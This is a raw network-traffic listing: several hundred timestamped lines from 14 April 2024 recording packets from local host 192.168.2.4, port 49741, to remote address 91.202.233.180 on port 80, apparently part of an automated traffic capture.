Apr 14, 2024 08:45:42.049659967 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.049681902 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.049700975 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.049731970 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.049993038 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.049993038 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.049993038 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.049993038 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.049993038 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.049993992 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.049993992 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.049993992 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.050107956 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.050107956 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.050107956 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.050147057 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.050187111 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.050229073 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.050256968 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.050283909 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.050302029 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.050329924 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.050352097 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.050403118 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.050403118 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.050427914 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.050448895 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.050477982 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.050513029 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.050533056 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.050549030 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.050582886 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.050601006 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.050630093 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.050663948 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.050683022 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.050699949 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.050728083 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.050750017 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.050786972 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.050806999 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.050826073 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.050847054 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.050883055 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.050900936 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.050925016 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.050961018 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.050981045 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.051002026 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.051038027 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.051062107 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.051080942 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.051103115 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.051137924 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.051155090 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.051176071 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.051217079 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.051250935 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.051307917 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.051307917 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.051343918 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.051397085 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.051397085 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.051417112 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.051440001 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.051486015 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.051506996 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.051522970 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.051544905 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.051575899 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.051597118 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.051614046 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.051635027 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.051656961 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.051681042 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.051707983 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.051729918 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.051759005 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.051778078 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.051799059 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.051827908 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.051846981 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.051875114 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.051898956 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.051919937 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.051940918 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.051974058 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.051994085 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.052018881 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.052037001 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.052073956 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.052093029 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.052139044 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.052158117 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.052176952 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.052216053 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.052264929 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.052264929 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.052284956 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.052315950 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.052336931 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.052356958 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.052396059 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.052421093 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.052448988 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.052469015 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.052490950 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.052525997 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.052556038 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.052556038 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.052596092 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.052619934 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.052653074 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.052675962 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.052695990 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.052725077 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.052742958 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.052771091 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.052829027 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.052869081 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.052887917 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.052922964 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.052942991 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.052963018 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.052982092 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.053021908 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.053039074 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.053060055 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.053087950 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.053103924 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.053139925 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.053157091 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.053184986 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.053206921 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.053248882 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.053267956 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.053284883 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.053330898 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.053330898 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.053359985 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.053381920 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.053419113 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.053438902 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.053462982 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.053481102 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.053518057 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.053538084 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.053560019 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.053584099 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.053606987 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.053634882 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.053652048 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.053687096 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.053714037 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.053733110 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.053756952 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.053781033 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.053809881 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.053838968 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.053864956 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.053881884 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.053917885 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.053940058 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.053978920 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.053997993 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.054020882 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.054049015 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.054066896 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.054104090 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.054141045 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.054186106 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.054205894 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.054239035 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.054260969 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.054295063 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.054313898 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.054332972 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.054414988 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.054435015 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.054466963 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.054486990 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.054519892 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.054541111 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.054558039 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.054577112 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.054610968 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.054630995 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.054650068 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.054671049 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.054707050 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.054728031 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.054744959 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.054761887 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.054801941 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.054801941 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.054827929 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.054846048 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.054874897 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.054893970 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.054928064 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.054946899 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.054965973 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.054990053 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.055011034 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.055032969 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.055061102 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.055077076 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.055110931 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.055140972 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.055169106 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.055191994 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.055219889 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.055237055 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.055274010 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.055294037 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.055318117 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.055336952 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.055365086 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.055382967 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.055417061 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.055438042 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.055454016 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.055480957 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.055509090 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.055532932 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.055560112 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.055577040 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.055603981 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.055623055 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.055658102 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.055676937 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.055697918 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.055718899 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.055751085 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.055767059 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.055799961 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.055819035 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.055845976 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.055865049 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.055898905 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.055917025 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.055938959 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.055960894 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.055994034 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.056010008 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.056037903 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.056058884 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.056087017 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.056106091 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.056134939 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.056163073 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.056179047 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.056236029 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.056236029 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.056272030 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.056288958 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.056307077 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.056337118 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.056360006 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.056380987 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.056404114 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.056441069 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.056476116 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.056476116 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.056497097 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.056529999 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.056555986 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.056571960 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.056593895 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.056619883 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.056638002 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.056680918 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.056680918 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.056711912 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.056729078 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.056757927 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.056776047 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.056811094 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.056840897 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.056857109 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.056873083 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.056905031 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.056931973 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.056946993 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.056966066 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.056993008 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.057015896 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.057037115 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.057056904 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.057089090 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.057116985 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.057135105 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.057153940 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.057188034 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.057209015 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.057229996 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.057255983 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.057276964 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.057300091 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.057321072 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.057343006 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.057368994 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.057385921 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.057424068 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.057459116 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.057459116 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.057488918 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.057504892 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.057529926 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.057550907 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.057576895 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.057598114 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.057626009 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.057643890 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.057671070 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.057688951 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.057713032 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.057740927 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.057756901 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.057785988 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.057813883 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.057835102 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.057858944 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.057878971 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.057900906 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.057929039 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.057959080 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.057976007 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.058000088 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.058026075 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.058044910 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.058065891 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.058092117 CEST	49741	80	192.168.2.4	91.202.233.180
